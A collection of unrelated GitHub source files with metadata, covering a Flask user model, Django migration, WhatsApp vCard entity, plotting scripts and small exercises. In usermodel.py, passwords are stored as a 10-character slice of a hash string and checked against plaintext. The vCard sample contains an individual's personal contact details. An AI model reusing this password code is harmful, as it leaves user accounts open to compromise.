c497e6c1ffed217a9eba1e4241cf90a0a6150b49 | 014b859ab3b428be5548ae6022fbb277395f772c | /Model/usermodel.py | f15e02a236d54ecb5a2e9284b890e8d8d5c6a131 | [
"MIT"
] | permissive | reezoobose/long_run | d3a00c713720a42a8755cd1fb1ff3e19c45a5a88 | cbce5cf475d96bcc9bc53f1f6227c8db237c24e5 | refs/heads/master | 2020-03-29T23:50:56.387331 | 2018-11-16T10:24:31 | 2018-11-16T10:24:31 | 150,492,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,118 | py | # <editor-fold desc="Import">
# -*- coding: utf-8 -*-
# import sql alchemy object .
from sql_alchemy_extension import sql_alchemy as db
# we need to store password in salt form .
from werkzeug.security import generate_password_hash, safe_str_cmp
# </editor-fold>
# class must inherit Model from sql Alchemy .
class UserModel(db.Model):
# <editor-fold desc="Database Table Connection and Coloumn Details">
"""
object representation of the user .
user is a model stored in database as an object .
inherit from Sql_alchemy model .
"""
# crete the table to store user model.
__tabalename_ = 'users'
# columns details contain by table name.
# is user logged in .
logged_in = db.Column(db.Boolean, default=False)
# unique not null username
username = db.Column(db.String(80))
# unique not null email id .
email_id = db.Column(db.String(30), primary_key=True)
# password
password = db.Column(db.String(80))
# user device_id where user is registering and log in .
device_id = db.Column(db.String(80))
# user in game money
us_dollar = db.Column(db.BigInteger)
# </editor-fold>
# <editor-fold desc="Constructor">
# constructor
def __init__(self, username, email_id, password, us_dollar=0, device_id=None):
"""
A user will be created with those parameter present .
:param username: user name of the user . It will be shown .
:param email_id: user email id for registration .
:param password: password for registration . secure salt will be stored in database .
:param us_dollar: In game currency
:param device_id: Device Id from which user is going to register .
"""
self.username = username
self.email_id = email_id
self.password = self.set_password(password)
self.logged_in = False
self.us_dollar = us_dollar
self.device_id = device_id
# </editor-fold>
# <editor-fold desc="Class Methods">
# region for classMethod
# convert the password into salt form to store in database.
@classmethod
def set_password(cls, password):
"""
Set Password return a secure hash of the password insert by the user .
:param password: password insert by the user .
:return:a string ie. secure hash of the password only 10 character from 5 to 15 .
"""
generated_hash = generate_password_hash(password)
return generated_hash[5:15]
# check the password that is stored in data base and password enter by user are same or not .
@classmethod
def check_password(cls, stored_password_in_db, received_password_from_user):
"""
compare the password used by user and the password stored in the database are same or not at the time of login .
:param stored_password_in_db: password stored in database for the user .
:param received_password_from_user: password that we received from the user .
:return: True/False
"""
return safe_str_cmp(stored_password_in_db, received_password_from_user)
# Is user present in DataBase.
# search is operated using user name and email id .
@classmethod
def find_user(cls, email_id):
"""
Find and user present in the database or not .
:param email_id:
:return: None if user not found or UserModel instance with all data .
"""
# Select from the table users where email_id = email_id limit 1 .
# return a UserModel Object .
return cls.query.filter_by(email_id=email_id).first( )
# Find the list of users are logged in at this instance .
@classmethod
def find_users_logged_in(cls):
"""
Find the List of users who are currently logged in .
:return: List of users those who are logged in .
"""
return {'Users': list(map(lambda x: x.json( ), cls.query.filter_by(logged_in=True).all( )))}
@classmethod
def get_leader_board(cls, leader_board_name):
"""
Newbie - 0 JGD to 500,000 JGD //Ok
Big Man - 500,001 JGD to 1,000,000 JGD //Ok
Businessman - 1,000,001 JGD to 5,000,000 JGD //Ok
Entrepreneur - 5,000,001 JGD to 500,000,000 JGD
Tycoon - 500,000,001 JGD to 2,000,000,000 JGD //Ok
:param leader_board_name: name of leader board .
:return: a list of user under the name of leader board supplied .
"""
user_leader_board_list = None
user_leader_board_name = None
if safe_str_cmp(leader_board_name, "Newbie"):
upper_limit = 500000
lower_limit = 0
user_leader_board_name = 'Newbie'
user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
elif safe_str_cmp(leader_board_name, "BigMan"):
upper_limit = 1000000
lower_limit = 500001
user_leader_board_name = 'BigMan'
user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
elif safe_str_cmp(leader_board_name, "Businessman"):
upper_limit = 5000000
lower_limit = 1000001
user_leader_board_name = 'Businessman'
user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
elif safe_str_cmp(leader_board_name, "Entrepreneur"):
upper_limit = 500000000
lower_limit = 5000001
user_leader_board_name = 'Entrepreneur'
user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
elif safe_str_cmp(leader_board_name, "Tycoon"):
upper_limit = 2000000000
lower_limit = 500000001
user_leader_board_name = 'Tycoon'
user_leader_board_list = cls.query.filter(cls.us_dollar.between(lower_limit, upper_limit))
return {'Leader Board': user_leader_board_name, 'User': [x.json() for x in user_leader_board_list],
"Success_Code": 1}, 200
# </editor-fold>
# <editor-fold desc="Instance Methods">
# Save the Object in the data base .
def save_data(self):
"""
Save data to database .
:return: null .
"""
db.session.add(self)
db.session.commit( )
# Remove the data from the data base .
def remove_data(self):
"""
Remove data from the database .
:return: null.
"""
db.session.delete(self)
db.session.commit( )
# To json
def json(self):
"""
convert in to json format .
:return: json formatted user data .
"""
return {'User_Name': self.username, 'Email': self.email_id, "Joe Games Currency": self.us_dollar}
# Mark a user as logged in or out .
def user_logged_in(self, logged_in):
"""
Make user logged in or logged out and save data .
:param logged_in: True / False.
:return: null .
"""
self.logged_in = logged_in
self.save_data( )
# </editor-fold>
| [
"reezoobose@rediffmail.com"
] | reezoobose@rediffmail.com |
94cd5f0cfadbc6930ff5dd982ee531f583b68885 | 58345f5012a1c24d638281d977e15c1dc5a8518c | /cs-module-hashtable/fib..py | 75141ccdaeb5d79ba538bd006515ac3c12d79923 | [] | no_license | SyriiAdvent/cs-module-project-hash-tables | 298d071cf632b3606f96f1b8e6bb128ee59508dd | e0fdb508c1e398211e20a56653d9b776730cea24 | refs/heads/master | 2022-11-23T23:49:50.116072 | 2020-08-06T01:45:39 | 2020-08-06T01:45:39 | 284,732,957 | 0 | 0 | null | 2020-08-06T01:45:40 | 2020-08-03T15:12:29 | Python | UTF-8 | Python | false | false | 120 | py | cache = {}
def fib(n):
if n <= 1: return 1
if n not in cache:
cache[n] = fib(n-1) + fib(n-2)
return cache[n] | [
"rgoldhaber24@gmail.com"
] | rgoldhaber24@gmail.com |
6c6dace090ac4698a71aa96258aa378ca9e059f0 | aec9a1f3d1d36f19724e745ca4d09a20f67208dc | /matching/migrations/0006_auto_20210114_2030.py | 799634392703d79e913d7c68e61a37828e2927c9 | [] | no_license | endlessor/open-united-backend | b1b1c3411d0d48bc79b35895c70f24d773ac7344 | 86f6905cce14b834b6bf059fd33157249978bd14 | refs/heads/main | 2023-04-29T13:35:28.529360 | 2021-05-17T14:16:39 | 2021-05-17T14:16:39 | 368,211,786 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 765 | py | # Generated by Django 3.1 on 2021-01-15 20:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('matching', '0005_auto_20210113_1839'),
]
operations = [
migrations.RemoveField(
model_name='taskclaimrequest',
name='status',
),
migrations.AddField(
model_name='taskclaimrequest',
name='kind',
field=models.IntegerField(choices=[(0, 'New'), (1, 'Approved'), (2, 'Rejected')], default=0),
),
migrations.AlterField(
model_name='taskclaim',
name='kind',
field=models.IntegerField(choices=[(0, 'Done'), (1, 'Active'), (2, 'Failed')], default=0),
),
]
| [
"robcoder@hotmail.com"
] | robcoder@hotmail.com |
e740d1914eb233fdd032f838c697340b3914b3c1 | c7a5f6eb6a74fb634e19b21113c7e15f592af826 | /models/Money.py | 4db297d857515b8f33526bf3ec2697c11e75bc31 | [] | no_license | Dmitriysp55/E-shop-lvl2 | b1cb7e82dd421c8647608c8009d4b6c298f29d46 | 3193c7f6c1a98b59431eac0c2099f6a446a29093 | refs/heads/main | 2023-07-08T21:00:55.110157 | 2021-08-17T10:20:54 | 2021-08-17T10:20:54 | 397,206,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,366 | py | CURR = ('EUR', 'USD', 'MDL')
class Money:
def __init__(self, id, amount, currency):
self.setId(id)
self.setAmount(amount)
self.setCurrency(currency)
def setId(self, id):
if type(id) is not int:
raise ValueError('Error: id must be integer')
if id<=0 or id>1000000:
raise ValueError("Error: id is not valid")
self._id = id
def getId(self):
return self._id
def setAmount(self, amount):
amount = int(amount)
if type(amount) is not int:
raise TypeError('Amount must be INT')
if amount < 0:
raise ValueError('Amount is less than 0')
self._amount = amount
def getAmount(self):
return self._amount
def setCurrency(self, currency):
if currency in CURR:
self._curency = currency
else:
raise Exception(f'{currency} is not in predefined list of currencies')
def getCurrency(self):
return self._curency
def __str__(self):
return f"{self._amount} {self._curency}"
def __repr__(self):
return str(self)
class MoneyRepositoryFactory:
def __init__(self):
self.__lastCreatedId = 0
self.__money = []
####### FACTORY methods #########
def getMoney(self, amount, currency):
id = self.__lastCreatedId + 1
obj = Money(id,amount, currency)
self.__lastCreatedId = obj.getId()
### remember the object in the list #####
self.save(obj)
return obj
####### REPOSITORY methods #########
# BREAD -> Browse, Read, Edit, Add, Delete
def save(self,money):
self.__money.append(money)
def all(self):
return tuple(self.__money)
def findById(self, id):
for p in self.__money:
if p._id == id:
return p
def findByProperty(self, searchProperty):
list_of_found = []
for obj in self.__money:
for name, value in obj.__dict__.items():
if value == searchProperty:
list_of_found.append(obj)
return list_of_found
def deleteById(self, id):
for obj in self.__money:
for name, value in obj.__dict__.items():
if value == id:
self.__money.remove(obj) | [
"noreply@github.com"
] | Dmitriysp55.noreply@github.com |
aaaeaee2bbe92043417c53d038fe346d6e67659e | ec9b63fc607b2c5d29e2bf4e11b0fd79855f0b14 | /python-client/test/test_payment_remittance_information.py | 5e3a82fb8891fc92a8c368cfafdb84e34dab3f61 | [] | no_license | syzer/F21 | 0d538fc417d3ae8369ce8a3392f74fb9460621e2 | 5aeac4cce9265632fd6d8d6680e833a55836d83c | refs/heads/master | 2020-05-01T04:23:38.219040 | 2019-04-16T09:18:46 | 2019-04-16T09:18:46 | 177,273,387 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,084 | py | # coding: utf-8
"""
Swiss Corporate API
This is the release candidate version of the \"Swiss Corporate API\" specification. # noqa: E501
OpenAPI spec version: 1.0.0.2-SNAPSHOT
Contact: swisscorpapi@six-group.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.payment_remittance_information import PaymentRemittanceInformation # noqa: E501
from swagger_client.rest import ApiException
class TestPaymentRemittanceInformation(unittest.TestCase):
"""PaymentRemittanceInformation unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPaymentRemittanceInformation(self):
"""Test PaymentRemittanceInformation"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.payment_remittance_information.PaymentRemittanceInformation() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"hexagon6@fet.li"
] | hexagon6@fet.li |
cca7933e5e9525d998480061afe282434637860a | e485bf3a4ef0ee46556fe0c33d16b9d40af54fc2 | /Kattis-Problems/Python-Solutions/PizzaCrust.py | c49aef3bc4f0e38d8d37c01e74d8bd2e2bafae7e | [] | no_license | djharten/Coding-Challenges | d48650569930a06db4e8b590d8f1ffa4d627bf3b | a1a85af8a7631ec05da70459d843db660f08169d | refs/heads/master | 2020-05-18T08:18:14.528845 | 2019-04-30T16:25:03 | 2019-04-30T16:25:03 | 184,289,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | import cmath
a,b = map(int, input().split())
b = a - b
a = cmath.pi * pow(a,2)
print(((cmath.pi * pow(b,2)) / a)*100) | [
"noreply@github.com"
] | djharten.noreply@github.com |
a3276781a20218d522af7d641743b76a41ef7f33 | 67f0d1f5f8fb32a98a5299975a0d5790f13a8167 | /action/conftest.py | 95e7f65612d677874f4a93930bed364e728294d1 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | akaihola/darker | 166fe18122af390dfd87b67eb9b7c9ca59c5f5a6 | e96018f086383a2dcfaab6825945fbee08daca2a | refs/heads/master | 2023-08-31T18:39:01.558709 | 2023-08-05T20:32:37 | 2023-08-05T20:32:37 | 240,935,953 | 547 | 49 | NOASSERTION | 2023-08-09T07:08:19 | 2020-02-16T17:40:03 | Python | UTF-8 | Python | false | false | 137 | py | """Configuration and fixtures for the GitHub action"""
# Don't try to run Pytest on the main action module
collect_ignore = ["main.py"]
| [
"13725+akaihola@users.noreply.github.com"
] | 13725+akaihola@users.noreply.github.com |
22c03deb0d8157383f3c1246c029e58a5a3f8e90 | 6ab67facf12280fedf7cc47c61ae91da0bcf7339 | /service/yowsup/yowsup/layers/protocol_media/protocolentities/message_media_vcard.py | 2d57fbcbadbf58e9a66ad180420dd4e70030640f | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later"
] | permissive | PuneethReddyHC/whatsapp-rest-webservice | 2f035a08a506431c40b9ff0f333953b855f9c461 | 822dfc46b80e7a26eb553e5a10e723dda5a9f77d | refs/heads/master | 2022-09-17T14:31:17.273339 | 2017-11-27T11:16:43 | 2017-11-27T11:16:43 | 278,612,537 | 0 | 1 | MIT | 2020-07-10T11:04:42 | 2020-07-10T11:04:41 | null | UTF-8 | Python | false | false | 5,305 | py | from yowsup.structs import ProtocolEntity, ProtocolTreeNode
from .message_media import MediaMessageProtocolEntity
class VCardMediaMessageProtocolEntity(MediaMessageProtocolEntity):
'''
<message t="{{TIME_STAMP}}" from="{{CONTACT_JID}}"
offline="{{OFFLINE}}" type="text" id="{{MESSAGE_ID}}" notify="{{NOTIFY_NAME}}">
<media type="vcard">
<vcard name="Hany Yasser">
BEGIN:VCARD
VERSION:3.0
N:Yasser;Hany;;;
FN:Hany Yasser
PHOTO;BASE64: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
BDAY;value=date:1989-01-05
ORG:Vodafone Egypt;
item1.EMAIL;type=INTERNET:hanyyasser@hotmail.com
item1.X-ABLabel:INTERNET
item2.EMAIL;type=INTERNET:hanybotbot@hotmail.com
item2.X-ABLabel:INTERNET
item3.ADR;type=HOME:;;Heliopolis;Cairo;Al Qahirah;;Egypt
item4.ADR;type=HOME:;;;cairo;;;Egypt
item5.URL:http://www.facebook.com/profile.php?id=626850952
item5.X-ABLabel:_$!<HomePage>!$_
X-FACEBOOK:hany.yasser1
END:VCARD
</vcard>
</media>
</message>
'''
def __init__(self, name, card_data, _id = None, _from = None, to = None, notify = None, timestamp = None, participant = None,
preview = None, offline = None, retry = None):
super(VCardMediaMessageProtocolEntity, self).__init__("vcard", _id, _from, to, notify, timestamp, participant, preview, offline, retry)
self.setVcardMediaProps(name,card_data)
def __str__(self):
out = super(MediaMessageProtocolEntity, self).__str__()
out += "Name: %s\n" % self.name
out += "Card Data: %s\n" % self.card_data
return out
def getName(self):
return self.name
def getCardData(self):
return self.card_data
def setVcardMediaProps(self, name, card_data):
self.name = name
self.card_data = card_data
def toProtocolTreeNode(self):
node = super(VCardMediaMessageProtocolEntity, self).toProtocolTreeNode()
mediaNode = node.getChild("media")
mediaNode["type"] = "vcard"
vcardNode = ProtocolTreeNode("vcard", {"name":self.name}, None,self.card_data)
mediaNode.addChild(vcardNode)
return node
@staticmethod
def fromProtocolTreeNode(node):
entity = MediaMessageProtocolEntity.fromProtocolTreeNode(node)
entity.__class__ = VCardMediaMessageProtocolEntity
mediaNode = node.getChild("media")
entity.setVcardMediaProps(
mediaNode.getAllChildren()[0].getAttributeValue('name'),
mediaNode.getChild("vcard").getData()
)
return entity | [
"svub@x900.svub.net"
] | svub@x900.svub.net |
270dd2884ed8cee274b40fa9bc94411663fdaa83 | 17c89e34e24564c0c4948b0e6b597ee2d9ab2761 | /bin/3a.py | ce30b4f181d28a41239d63840aa30513fcfa9c07 | [] | no_license | maciejczyzewski/kck2019 | 3cc024487dfba535abdb3b4251e29512729ccb9b | ec11ee42e26aa83a086382e4ecd54e8cb52c9bb1 | refs/heads/master | 2020-08-23T21:14:48.613366 | 2019-10-26T00:27:31 | 2019-10-26T00:27:31 | 216,707,391 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,175 | py | import matplotlib
# matplotlib.use("Agg") # So that we can render files without GUI
import matplotlib.pyplot as plt
from matplotlib import rc
import numpy as np
import sys, math
from matplotlib import colors
from collections.abc import Iterable
def plot_color_gradients(gradients, names, height=None):
rc("legend", fontsize=10)
column_width_pt = 400 # Show in latex using \the\linewidth
pt_per_inch = 72
size = column_width_pt / pt_per_inch
height = 0.75 * size if height is None else height
fig, axes = plt.subplots(nrows=len(gradients),
sharex=True,
figsize=(size, height))
fig.subplots_adjust(top=1.00, bottom=0.05, left=0.25, right=0.95)
if not isinstance(axes, Iterable):
axes = [axes]
for ax, gradient, name in zip(axes, gradients, names):
# Create image with two lines and draw gradient on it
img = np.zeros((2, 1024, 3))
for i, v in enumerate(np.linspace(0, 1, 1024)):
img[:, i] = gradient(v)
im = ax.imshow(img, aspect="auto")
im.set_extent([0, 1, 0, 1])
ax.yaxis.set_visible(False)
pos = list(ax.get_position().bounds)
x_text = pos[0] - 0.25
y_text = pos[1] + pos[3] / 2.0
fig.text(x_text, y_text, name, va="center", ha="left", fontsize=10)
plt.show()
fig.savefig("gradients.pdf")
################################################################################
################################################################################
n = lambda x: max(0, min(1, x))
# a - ile osiaga maksymalnie
# b - gdzie jest szczyt
# c - tempo/ciezkosc
def gaussian(x, a, b, c, d=0):
b += 0.00001 # FIXME: ?
return a * math.exp(-(x - b)**2 / (2 * c**2)) + d
def isogradient(v, pallete):
params = isopallete(pallete)
def find_near_k(v, params, k=4):
sort_list = []
for p in params:
diff = abs(v * 255 - p[1])
sort_list.append([diff, p])
result = sorted(sort_list)[0:k]
return [p[1] for p in result]
r = sum([gaussian(v * 255, *p) for p in find_near_k(v, params[0])])
g = sum([gaussian(v * 255, *p) for p in find_near_k(v, params[1])])
b = sum([gaussian(v * 255, *p) for p in find_near_k(v, params[2])])
return (n(int(r) / 255), n(int(g) / 255), n(int(b) / 255))
def isopallete(pallete):
# FIXME: output could be cached
vec_r, vec_g, vec_b = [], [], []
span = len(pallete.keys())
for key, val in pallete.items():
dynamic_param = 255 / (span * 2)
vec_r += [[val[0], key * 255, dynamic_param]]
vec_g += [[val[1], key * 255, dynamic_param]]
vec_b += [[val[2], key * 255, dynamic_param]]
return [vec_r, vec_g, vec_b]
def test_gradient(f):
vec_x = np.arange(0, 1, 0.005)
vec_y1, vec_y2, vec_y3 = np.vectorize(f)(vec_x)
plt.plot(vec_x, vec_y1, color="red")
plt.plot(vec_x, vec_y2, color="green")
plt.plot(vec_x, vec_y3, color="blue")
plot_color_gradients([f], ["test"], height=0.5)
sys.exit()
################################################################################
################################################################################
def hsv2rgb(h, s, v):
c = v * s
x = c * (1 - abs((h / 60) % 2 - 1))
m = v - c
r, g, b = {
0: (c, x, 0),
1: (x, c, 0),
2: (0, c, x),
3: (0, x, c),
4: (x, 0, c),
5: (c, 0, x),
}[int(h / 60) % 6]
return ((r + m), (g + m), (b + m))
def gradient_rgb_bw(v):
return (v, v, v)
def gradient_rgb_gbr(v):
pallete = {0: [0, 255, 0], 0.5: [0, 0, 255], 1: [255, 0, 0]}
return isogradient(v, pallete)
def gradient_rgb_gbr_full(v):
pallete = {
0: [0, 255, 0],
1 * (1 / 4): [0, 255, 255],
2 * (1 / 4): [0, 0, 255],
3 * (1 / 4): [255, 0, 255],
1: [255, 0, 0],
}
return isogradient(v, pallete)
def gradient_rgb_wb_custom(v):
pallete = {
0: [255, 255, 255],
1 * (1 / 7): [255, 0, 255],
2 * (1 / 7): [0, 0, 255],
3 * (1 / 7): [0, 255, 255],
4 * (1 / 7): [0, 255, 0],
5 * (1 / 7): [255, 255, 0],
6 * (1 / 7): [255, 0, 0],
1: [0, 0, 0],
}
return isogradient(v, pallete)
def interval(start, stop, value):
return start + (stop - start) * value
def gradient_hsv_bw(v):
return hsv2rgb(0, 0, v)
def gradient_hsv_gbr(v):
return hsv2rgb(interval(120, 360, v), 1, 1)
def gradient_hsv_unknown(v):
return hsv2rgb(120 - 120 * v, 0.5, 1)
def gradient_hsv_custom(v):
return hsv2rgb(360 * (v), n(1 - v**2), 1)
if __name__ == "__main__":
def toname(g):
return g.__name__.replace("gradient_", "").replace("_", "-").upper()
# XXX: test_gradient(gradient_rgb_gbr_full)
gradients = (
gradient_rgb_bw,
gradient_rgb_gbr,
gradient_rgb_gbr_full,
gradient_rgb_wb_custom,
gradient_hsv_bw,
gradient_hsv_gbr,
gradient_hsv_unknown,
gradient_hsv_custom,
)
plot_color_gradients(gradients, [toname(g) for g in gradients])
| [
"maciejanthonyczyzewski@gmail.com"
] | maciejanthonyczyzewski@gmail.com |
f3b4ddcd9fbba237e91724f8cfa958504def9ca8 | 51a3abc644875ae0e644891c8c9c0d6736ddbb12 | /meta-Numeriseur/recipes-microphone/microphone/microphone/setup.py | 2b1cd05ea5dfec8847b2852eec5638975c467fcf | [] | no_license | sangmohamad/numeriseur | f2222cfa9e130922bbc39efcd46e13cf8b2acc73 | 20d78e90c2c0f0c6184af127401b3a58f2b2672d | refs/heads/master | 2022-12-05T16:30:44.895356 | 2020-09-01T11:10:34 | 2020-09-01T11:10:34 | 290,131,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:98719b0fae8cdae1a3e3d68eaa037c3912550d71ca2e318e8e08c8366bb58fa4
size 476
| [
"sanogomohamad9@gmail.com"
] | sanogomohamad9@gmail.com |
4d43c355b295413160a662de7848939418a5f001 | dd13c65a0ee5620d57d119b6e7f1c97d8d6423b3 | /pyth/sqr.py | 329cc366b04cb5d5d791b47cff23b68783b7fa01 | [] | no_license | payalaharikrishna/demomarch | 5674f08aae74aa475f2a65eaecf900c428935dae | a6df21d3a6ec8b42919a2706a3c537f2292ace6b | refs/heads/master | 2021-07-01T10:03:10.423817 | 2020-08-20T06:11:13 | 2020-08-20T06:11:13 | 177,396,164 | 0 | 0 | null | 2020-10-13T13:30:37 | 2019-03-24T09:48:32 | Python | UTF-8 | Python | false | false | 118 | py | class Myclass:
@staticmethod
def prod(x,y):
return x*y
res=Myclass.prod(12,6)
print('result=',res)
| [
"krish888@gmail.com"
] | krish888@gmail.com |
7e6eab47934ec89549b741534085981ee5ab9560 | 74335cf752db684dca020483b440a89c20642723 | /hal_plugin/plotting/plotting.py | 37762efac41776acc518651582d84a18418610d3 | [] | no_license | ChillkroeteTTS/Comparison-of-Two-Optimization-Methods-for-Operating-a-Smart-Home-Power-Grid | 707ae315c06a90bfd5ba2ee6191afc430e391ea1 | 5319f89a3c00e67034b5b4714734e253c8c7a518 | refs/heads/master | 2022-10-01T21:46:29.331228 | 2020-06-02T12:34:15 | 2020-06-02T12:34:15 | 268,785,317 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,982 | py | from pathlib import Path
import pandas as pd
import matplotlib.pyplot as plt
from pandas import DataFrame
from hal_plugin.plotting.hal_data_processing import load_hal_b1_df, hal_load_import_kwh, load_hal_storage_df, \
load_hal_p2h_df, load_all_hal_results
from hal_plugin.plotting.oemof_data_processing import load_oemof_net_power_flow, load_oemof_costs
from oemof_runs.plot import get_storage_data_from_saved_model
def plot_storage_diff(hal_dir, sim_name, oemof_results):
oemof_storage_df, oemof_h_storage_df = get_storage_data_from_saved_model(oemof_results)
hal_storage_df, hal_heat_storage_df = load_hal_storage_df(hal_dir, sim_name)
storage_max_capacity = 4000
diff = hal_storage_df['soc begin[%]'] - (
oemof_storage_df[(('storage', 'None'), 'capacity')] / storage_max_capacity) * 100
h_diff = hal_heat_storage_df['soc begin[%]'] - (
oemof_h_storage_df[(('heat_storage', 'None'), 'capacity')] / storage_max_capacity) * 100
diff_df = pd.DataFrame({'power soc diff': diff,
'heat soc diff': h_diff})
diff_df.set_index(hal_storage_df.index)
diff_df.plot(title='SOC Storage Difference -=hal, +=oemof', subplots=True)
def plot_general_hal_results(result_dir: Path):
df = load_all_hal_results(result_dir)
df2 = df.reindex(sorted(df.columns), axis=1)
df2.plot(title='HAL Results', subplots=True, sort_columns=True)
def plot_net_power_flow_analysis(hal_result_dir, sim_name, oemof_results):
oemof_net_power_flow = load_oemof_net_power_flow(oemof_results)
hal_net_power_flow = load_hal_b1_df(hal_result_dir, sim_name)
fig, axes = plt.subplots(nrows=3)
net_flow_df = pd.DataFrame(
{'hal': hal_net_power_flow['res_power[W]'], 'oemof': oemof_net_power_flow['net_power_flow']},
index=oemof_net_power_flow.index)
net_flow_df.plot(title='Net Power Flows [w] (positive = import)', ax=axes[0])
net_flow_df.plot.hist(bins=100, ax=axes[1])
net_flow_df.plot.box(ax=axes[2], showfliers=False, grid=True)
def plot_kwh_analysis(hal_result_dir, sim_name, oemof_results):
hal_import = hal_load_import_kwh(hal_result_dir, sim_name)
oemof_import = load_oemof_costs(oemof_results)
fig, axes = plt.subplots(nrows=3)
total_hal = hal_import['wh_total'] / 1000
total_oemof = oemof_import['wh_total'] / 1000
mixed_costs = pd.DataFrame({
# 'hal_power_import': hal_import['wh'] / 1000,
